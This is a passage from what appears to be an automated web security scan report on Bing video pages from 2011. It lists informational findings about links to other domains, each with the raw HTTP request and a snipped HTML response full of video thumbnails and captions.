...[SNIP]...
;about&#32;the&#32;changes&#32;coming&#32;to&#32;Season&#32;10.&#32;&#34;American&#32;Idol&#34;&#32;airs&#32;Wednesdays&#32;and&#32;Thursdays&#32;at&#32;8&#32;p.m.&#32;ET&#47;PT&#32;on&#32;FOX." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;791e66cc-e3fe-45c2-92f5-55979db0a7b3&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
32;finale&#32;Ryan&#32;Seacrest&#32;and&#32;Simon&#32;Cowell&#32;go&#32;inside&#32;Simon&#39;s&#32;extravagant&#32;trailer&#32;and&#32;Simon&#32;introduces&#32;British&#32;boy&#32;band&#32;JLS." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;c47cb72f-3b80-4f02-903b-f9bc5699b400&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
m/videos/watch/video/justin-bieber-talks-with-ryan-seacrest-pt-2/5ep3p1t?q=Ryan%20Seacrest&rel=MSN" class="motionThumb playerUrl"
title="Ryan&#32;Seacrest&#32;interviews&#32;Justin&#32;Bieber" >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;2e763b1c-1444-49ad-82c9-a62ec883337e&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
&#32;she&#32;and&#32;Ryan&#32;Seacrest&#32;are&#32;dating.&#32;Has&#32;he&#32;visited&#32;her&#32;on&#32;the&#32;set&#63;&#32;Plus,&#32;will&#32;she&#32;return&#32;to&#32;&#34;Dancing&#34;&#63;" >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;97b17865-206f-4b10-8e1d-483c13059d35&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
deos/watch/video/ryan-seacrest-part-1/17wnurhvy?q=Ryan%20Seacrest&rel=MSN" class="motionThumb playerUrl"
title="Part&#32;1&#32;of&#32;Jimmy&#39;s&#32;interview&#32;with&#32;Ryan&#32;Seacrest." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;4b0c18f6-74e1-45a7-9cb8-10325a65ccb1&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
2;Spice&#32;how&#32;great&#32;their&#32;new&#32;commercial&#32;was.&#32;And&#32;to&#32;his&#32;surprise&#32;he&#32;got&#32;a&#32;response&#32;from&#32;the&#32;Old&#32;Spice&#32;guy&#32;himself." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;0b6d89aa-53fd-4482-b58f-0477c9668812&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
m/videos/watch/video/justin-bieber-talks-with-ryan-seacrest-pt-1/55lymwa?q=Ryan%20Seacrest&rel=MSN" class="motionThumb playerUrl"
title="Ryan&#32;Seacrest&#32;interviews&#32;Justin&#32;Bieber" >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;291a31e1-4e41-492a-afa4-44d5d060f37b&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
videos/watch/video/sundance-2011-ryan-seacrest-from-the-bing-bar/1rwlnk0je?q=Ryan%20Seacrest&rel=MSN" class="motionThumb playerUrl"
title="Ryan&#32;Seacrest&#32;from&#32;the&#32;Bing&#32;Bar." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;690064fc-df17-4c4b-bece-61431ddd69a8&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
en&#32;shot&#32;and&#32;killed&#32;while&#32;trying&#32;to&#32;storm&#32;the&#32;Egyptian&#32;interior&#32;ministry&#32;in&#32;Cairo.&#32;CBNC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;e177ac59-7cfe-4492-a8b4-55915bc801ac&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
unt&#32;of&#32;snow&#32;residents&#32;in&#32;the&#32;Northeast&#32;can&#32;expect&#32;to&#32;see&#32;as&#32;well&#32;as&#32;a&#32;chilly&#32;system&#32;expected&#32;to&#32;hit&#32;the&#32;West." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9496e26e-5c57-466b-bd0d-af7ab8a49f84&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
streets&#32;of&#32;Cairo,&#32;Egypt,&#32;while&#32;continuing&#32;to&#32;demand&#32;the&#32;removal&#32;of&#32;President&#32;Mubarak.&#32;CNBC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;93f4a343-3ee5-49a2-bfa8-99e055385b9c&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
;a&#32;gorilla&#32;in&#32;a&#32;British&#32;wildlife&#32;preserve&#32;that&#8217;s&#32;becoming&#32;an&#32;internet&#32;sensation&#32;by&#32;the&#32;way&#32;he&#32;walks&#32;like&#32;a&#32;man." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;38ae05db-21f0-4232-935c-dc0482988d92&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
&#32;fine&#32;diplomatic&#32;line&#32;with&#32;Egyptian&#32;officials&#32;as&#32;unrest&#32;grows&#32;in&#32;the&#32;streets&#32;of&#32;Cairo.&#32;NBC&#39;s&#32;Andrea&#32;Mitchell&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9f5e7858-a321-4506-bd48-5fe5c11524e4&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,52.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

22.412. http://www.bing.com/videos/watch/video/where-it-all-began/17wv375x2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/where-it-all-began/17wv375x2

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /videos/watch/video/where-it-all-began/17wv375x2?q=who+do+you+think+you+are&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=341
Content-Length: 104644
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:58:19 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:37 GMT
Connection: close
Set-Cookie: _SS=SID=E60514C9F1E446758A7DCFAAFE1F4FA1; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:37 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c9eaa226e970444bbada7130c6245e910; expires=Mon, 28-Jan-2013 23:52:37 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:37 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/where-it-all-began/17wv375x2" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fwhere-it-all-began%2f17wv375x2%3ffrom%3den-us_fblike&amp;locale=en_US&amp;layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;font=arial&amp;colorscheme=dark&amp;height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http&#58;&#47;&#47;img1.video.s-redacted&#47;res&#47;1.0.3710.02&#47;i&#47;videoModule&#47;timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http&#58;&#47;&#47;www.hulu.com&#47;who-do-you-think-you-are" data-instName="InfoRelatedLinks">Hulu - Who Do You Think You Are?</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http&#58;&#47;&#47;www.hulu.com&#47;watch&#63;content_id&#61;50117868" data-instName="InfoRelatedLinks">Hulu Watch Page - Where It All Began</a>
...[SNIP]...
s="motionThumb playerUrl"
title="Eight&#32;of&#32;our&#32;most&#32;favorite&#32;celebrities&#32;travel&#32;the&#32;globe&#32;to&#32;unlock&#32;the&#32;mysteries&#32;of&#32;their&#32;heritage." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;c54b46a6-0935-40a0-b5bc-d168ded2e84c&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
%20are&rel=MSN" class="motionThumb playerUrl"
title="The&#32;amazing&#32;journies&#32;of&#32;celebrities&#39;&#32;pasts&#32;is&#32;back&#32;for&#32;season&#32;two&#32;on&#32;February&#32;4th." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;28b30d21-82db-4788-9b33-1a1558ad6b5b&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
Url"
title="Discover&#32;the&#32;singing&#32;star&#39;s&#32;connection&#32;to&#32;George&#32;Washington&#32;on&#32;this&#32;season&#32;of&#32;Who&#32;Do&#32;You&#32;Think&#32;You&#32;Are&#63;" >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;d7cbcfd2-5c80-43aa-92b3-da80c740b8d9&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
0think%20you%20are&rel=MSN" class="motionThumb playerUrl"
title="Eight&#32;of&#32;today&#39;s&#32;hottest&#32;celebrities&#32;learn&#32;how&#32;history&#32;has&#32;shaped&#32;their&#32;lives." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;53511df1-cab0-4899-b3ac-57fd23e16f42&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
q=who%20do%20you%20think%20you%20are&rel=MSN" class="motionThumb playerUrl"
title="Vanessa&#32;makes&#32;a&#32;fascinating&#32;discovery&#32;about&#32;her&#32;great&#32;great&#32;grandfather." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;4199fb4f-0aa2-47ec-88dc-e308ea0b56d2&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
lass="motionThumb playerUrl"
title="Get&#32;to&#32;know&#32;Vanessa&#32;as&#32;she&#39;s&#32;about&#32;to&#32;embark&#32;on&#32;the&#32;journey&#32;of&#32;not&#32;just&#32;one&#32;lifetime..." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;374bde5b-6704-4192-a1f6-9146f8d2ebd2&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
km4?q=who%20do%20you%20think%20you%20are&rel=MSN" class="motionThumb playerUrl"
title="A&#32;look&#32;at&#32;singing&#32;star&#32;Tim&#32;McGraw&#39;s&#32;incredible&#32;upcoming&#32;journey." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;a4423ac0-090e-40c9-8a6a-3ec31bb067a7&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
" class="motionThumb playerUrl"
title="Vanessa&#32;Williams&#32;makes&#32;more&#32;than&#32;one&#32;rare&#32;discovery&#32;at&#32;the&#32;National&#32;Archives&#32;in&#32;Washington,&#32;D.C." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;1f9e42d4-9168-44cd-be7a-a673ec791b6a&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
humb playerUrl"
title="Vanessa&#39;s&#32;journey&#32;into&#32;her&#32;family&#39;s&#32;past&#32;being&#32;with&#32;a&#32;visit&#32;to&#32;her&#32;father&#39;s&#32;final&#32;resting&#32;place." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;7a2f818c-56ef-4d3b-a7f5-cc654d6c17ed&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
ation/17w25sd78?q=who%20do%20you%20think%20you%20are&rel=MSN" class="motionThumb playerUrl"
title="Lisa&#32;Kudrow&#32;explains&#32;why&#32;we&#32;Americans&#32;are&#32;just&#32;as&#32;smart." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;2eaf70dc-6430-446a-867d-8b8314058f1a&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
en&#32;shot&#32;and&#32;killed&#32;while&#32;trying&#32;to&#32;storm&#32;the&#32;Egyptian&#32;interior&#32;ministry&#32;in&#32;Cairo.&#32;CBNC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;e177ac59-7cfe-4492-a8b4-55915bc801ac&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
unt&#32;of&#32;snow&#32;residents&#32;in&#32;the&#32;Northeast&#32;can&#32;expect&#32;to&#32;see&#32;as&#32;well&#32;as&#32;a&#32;chilly&#32;system&#32;expected&#32;to&#32;hit&#32;the&#32;West." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9496e26e-5c57-466b-bd0d-af7ab8a49f84&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
streets&#32;of&#32;Cairo,&#32;Egypt,&#32;while&#32;continuing&#32;to&#32;demand&#32;the&#32;removal&#32;of&#32;President&#32;Mubarak.&#32;CNBC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;93f4a343-3ee5-49a2-bfa8-99e055385b9c&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
;a&#32;gorilla&#32;in&#32;a&#32;British&#32;wildlife&#32;preserve&#32;that&#8217;s&#32;becoming&#32;an&#32;internet&#32;sensation&#32;by&#32;the&#32;way&#32;he&#32;walks&#32;like&#32;a&#32;man." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;38ae05db-21f0-4232-935c-dc0482988d92&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
&#32;fine&#32;diplomatic&#32;line&#32;with&#32;Egyptian&#32;officials&#32;as&#32;unrest&#32;grows&#32;in&#32;the&#32;streets&#32;of&#32;Cairo.&#32;NBC&#39;s&#32;Andrea&#32;Mitchell&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9f5e7858-a321-4506-bd48-5fe5c11524e4&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,52.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

22.413. http://www.bing.com/videos/watch/video/where-it-all-began/17wv375x2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/where-it-all-began/17wv375x2

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /videos/watch/video/where-it-all-began/17wv375x2?q=who+do+you+think+you+are&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=556
Content-Length: 104959
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:09:22 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:00:05 GMT
Connection: close
Set-Cookie: _SS=SID=2B26CC69B7AE484CA5563E88686D052E; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:05 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cf00799a29aba406fac6b308bdc571c11; expires=Tue, 29-Jan-2013 17:00:05 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:05 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/where-it-all-began/17wv375x2" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fwhere-it-all-began%2f17wv375x2%3ffrom%3den-us_fblike&amp;locale=en_US&amp;layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;font=arial&amp;colorscheme=dark&amp;height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http&#58;&#47;&#47;img1.video.s-redacted&#47;res&#47;1.0.3710.02&#47;i&#47;videoModule&#47;timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http&#58;&#47;&#47;www.hulu.com&#47;who-do-you-think-you-are" data-instName="InfoRelatedLinks">Hulu - Who Do You Think You Are?</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http&#58;&#47;&#47;www.hulu.com&#47;watch&#63;content_id&#61;50117868" data-instName="InfoRelatedLinks">Hulu Watch Page - Where It All Began</a>
...[SNIP]...
s="motionThumb playerUrl"
title="Eight&#32;of&#32;our&#32;most&#32;favorite&#32;celebrities&#32;travel&#32;the&#32;globe&#32;to&#32;unlock&#32;the&#32;mysteries&#32;of&#32;their&#32;heritage." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;c54b46a6-0935-40a0-b5bc-d168ded2e84c&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
%20are&rel=MSN" class="motionThumb playerUrl"
title="The&#32;amazing&#32;journies&#32;of&#32;celebrities&#39;&#32;pasts&#32;is&#32;back&#32;for&#32;season&#32;two&#32;on&#32;February&#32;4th." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;28b30d21-82db-4788-9b33-1a1558ad6b5b&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
Url"
title="Discover&#32;the&#32;singing&#32;star&#39;s&#32;connection&#32;to&#32;George&#32;Washington&#32;on&#32;this&#32;season&#32;of&#32;Who&#32;Do&#32;You&#32;Think&#32;You&#32;Are&#63;" >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;d7cbcfd2-5c80-43aa-92b3-da80c740b8d9&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
q=who%20do%20you%20think%20you%20are&rel=MSN" class="motionThumb playerUrl"
title="Vanessa&#32;makes&#32;a&#32;fascinating&#32;discovery&#32;about&#32;her&#32;great&#32;great&#32;grandfather." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;4199fb4f-0aa2-47ec-88dc-e308ea0b56d2&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
0think%20you%20are&rel=MSN" class="motionThumb playerUrl"
title="Eight&#32;of&#32;today&#39;s&#32;hottest&#32;celebrities&#32;learn&#32;how&#32;history&#32;has&#32;shaped&#32;their&#32;lives." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;53511df1-cab0-4899-b3ac-57fd23e16f42&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
humb playerUrl"
title="Vanessa&#39;s&#32;journey&#32;into&#32;her&#32;family&#39;s&#32;past&#32;being&#32;with&#32;a&#32;visit&#32;to&#32;her&#32;father&#39;s&#32;final&#32;resting&#32;place." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;7a2f818c-56ef-4d3b-a7f5-cc654d6c17ed&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
km4?q=who%20do%20you%20think%20you%20are&rel=MSN" class="motionThumb playerUrl"
title="A&#32;look&#32;at&#32;singing&#32;star&#32;Tim&#32;McGraw&#39;s&#32;incredible&#32;upcoming&#32;journey." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;a4423ac0-090e-40c9-8a6a-3ec31bb067a7&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
" class="motionThumb playerUrl"
title="Vanessa&#32;Williams&#32;makes&#32;more&#32;than&#32;one&#32;rare&#32;discovery&#32;at&#32;the&#32;National&#32;Archives&#32;in&#32;Washington,&#32;D.C." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;1f9e42d4-9168-44cd-be7a-a673ec791b6a&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
lass="motionThumb playerUrl"
title="Get&#32;to&#32;know&#32;Vanessa&#32;as&#32;she&#39;s&#32;about&#32;to&#32;embark&#32;on&#32;the&#32;journey&#32;of&#32;not&#32;just&#32;one&#32;lifetime..." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;374bde5b-6704-4192-a1f6-9146f8d2ebd2&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
